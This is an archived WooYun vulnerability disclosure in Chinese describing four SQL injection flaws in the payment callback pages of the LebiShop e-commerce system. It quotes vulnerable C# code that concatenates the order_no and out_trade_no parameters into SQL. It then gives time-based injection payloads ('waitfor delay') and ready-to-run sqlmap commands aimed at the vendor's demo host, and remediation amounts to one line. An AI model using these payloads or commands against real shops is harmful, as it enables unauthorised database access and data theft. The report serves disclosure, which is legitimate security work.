乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-05: 细节已通知厂商并且等待厂商处理中 2015-03-10: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2015-05-04: 细节向核心白帽子及相关领域专家公开 2015-05-14: 细节向普通白帽子公开 2015-05-24: 细节向实习白帽子公开 2015-06-08: 细节向公众公开
LebiShop商城系统最新版SQL注入二 四处 官方demo演示当前版本: V3.2.00更新日期: 2015-01-27
注入一LebiShop\onlinepay\dinpay\return_url.aspx源码如下
protected void Page_Load(object sender, EventArgs e){ string str = base.Request.Form["merchant_code"].ToString().Trim(); string str2 = base.Request.Form["notify_type"].ToString().Trim(); string str3 = base.Request.Form["notify_id"].ToString().Trim(); base.Request.Form["interface_version"].ToString().Trim(); base.Request.Form["sign_type"].ToString().Trim(); string str4 = base.Request.Form["sign"].ToString().Trim(); string code = base.Request.Form["order_no"].ToString().Trim(); //没处理 string str6 = base.Request.Form["order_time"].ToString().Trim(); string str7 = base.Request.Form["order_amount"].ToString().Trim(); string str8 = base.Request.Form["extra_return_param"].ToString().Trim(); string outcode = base.Request.Form["trade_no"].ToString().Trim(); string str10 = base.Request.Form["trade_time"].ToString().Trim(); string str11 = base.Request.Form["trade_status"].ToString().Trim(); string str12 = base.Request.Form["bank_seq_no"]; string str13 = ""; if ((str12 != null) && (str12 != "")) { str13 = str13 + "bank_seq_no=" + str12.ToString().Trim() + "&"; } if ((str8 != null) && (str8 != "")) { str13 = str13 + "extra_return_param=" + str8 + "&"; } str13 = (str13 + "interface_version=V3.0&") + "merchant_code=" + str + "&"; if ((str3 != null) && (str3 != "")) { str13 = str13 + "notify_id=" + str3 + "¬ify_type=" + str2 + "&"; } str13 = ((((str13 + "order_amount=" + str7 + "&") + "order_no=" + code + "&") + "order_time=" + str6 + "&") + "trade_no=" + outcode + "&") + "trade_status=" + str11 + "&"; if ((str10 != null) && (str10 != "")) { str13 = str13 + "trade_time=" + str10 + "&"; } Lebi_OnlinePay onlinePay = Money.GetOnlinePay(code); //跟进 if (onlinePay == null) { base.Response.Write("系统错误"); base.Response.End(); }
public static Lebi_OnlinePay GetOnlinePay(string code){ return GetOnlinePay(B_Lebi_Order.GetModel("Code='" + code + "'")); //没处理参数存在注入}
注入二 三 四
LebiShop\onlinepay\alipayDBJY\return_url.aspxLebiShop\onlinepay\alipayJSDZ\return_url.aspxLebiShop\onlinepay\alipaySJK\return_url.aspx
代码一样
protected void Page_Load(object sender, EventArgs e){ SortedDictionary<string, string> requestGet = this.GetRequestGet(); string ordercode = base.Request.QueryString["out_trade_no"]; //没处理 Lebi_Order model = B_Lebi_Order.GetModel("Code='" + ordercode + "'"); //跟进 if (model == null) { base.Response.Write("系统错误"); base.Response.End(); } else if (requestGet.Count > 0) { Notify notify = new Notify(model); if (notify.Verify(requestGet, base.Request.QueryString["notify_id"], base.Request.QueryString["sign"])) { string outcode = base.Request.QueryString["trade_no"]; string text1 = base.Request.QueryString["trade_status"]; if (base.Request.QueryString["trade_status"] == "WAIT_SELLER_SEND_GOODS") { Order.OnlinePaySuccess(ordercode, outcode, true); } else { base.Response.Write("trade_status=" + base.Request.QueryString["trade_status"]); } base.Response.Write("验证成功<br />"); } else { base.Response.Write("验证失败"); } }public Lebi_Order GetModel(string strWhere){ if (strWhere.IndexOf("lbsql{") > 0) { SQLPara para = new SQLPara(strWhere, "", ""); return this.GetModel(para); } StringBuilder builder = new StringBuilder(); builder.Append("select top 1 * from [Lebi_Order] "); builder.Append(" where " + strWhere); //直接带入了没处理 存在注入 Lebi_Order order = new Lebi_Order(); DataSet set = SqlUtils.SqlUtilsInstance.TextExecuteDataset(builder.ToString()); if (set.Tables[0].Rows.Count <= 0) { return null; }
第一处
http://demo.lebi.cn/onlinepay/dinpay/return_url.aspx
分别post提交
merchant_code=1¬ify_type=1¬ify_id=1&interface_version=1&sign_type=1&sign=1&order_time=1&order_amount=1&extra_return_param=1&trade_no=1&trade_time=1&trade_status=1&order_no=1
merchant_code=1¬ify_type=1¬ify_id=1&interface_version=1&sign_type=1&sign=1&order_time=1&order_amount=1&extra_return_param=1&trade_no=1&trade_time=1&trade_status=1&order_no=1';waitfor delay '0:0:5';--
存在时间差 基于时间的注入sqlmap扫描
sqlmap -u "http://demo.lebi.cn/onlinepay/dinpay/return_url.aspx" --data "merchant_code=1¬ify_type=1¬ify_id=1&interface_version=1&sign_type=1&sign=1&order_time=1&order_amount=1&extra_return_param=1&trade_no=1&trade_time=1&trade_status=1&order_no=1" -p "order_no" --dbms "mssql" --technique=T --current-db --time-sec 10
注入二 三 四分别访问
http://demo.lebi.cn/onlinepay/alipayDBJY/return_url.aspxhttp://demo.lebi.cn/onlinepay/alipayJSDZ/return_url.aspxhttp://demo.lebi.cn/onlinepay/alipaySJK/return_url.aspx
post提交
out_trade_no=1out_trade_no=1';waitfor delay '0:0:5';--
很明显的时间差 基于时间注入sqlmap扫描
sqlmap -u "http://demo.lebi.cn/onlinepay/alipaySJK/return_url.aspx" --data "out_trade_no=1" --dbms "mssql" --technique=T --time-sec 10 --current-db
对参数进行处理
危害等级:无影响厂商忽略
忽略时间:2015-06-08 11:15
暂无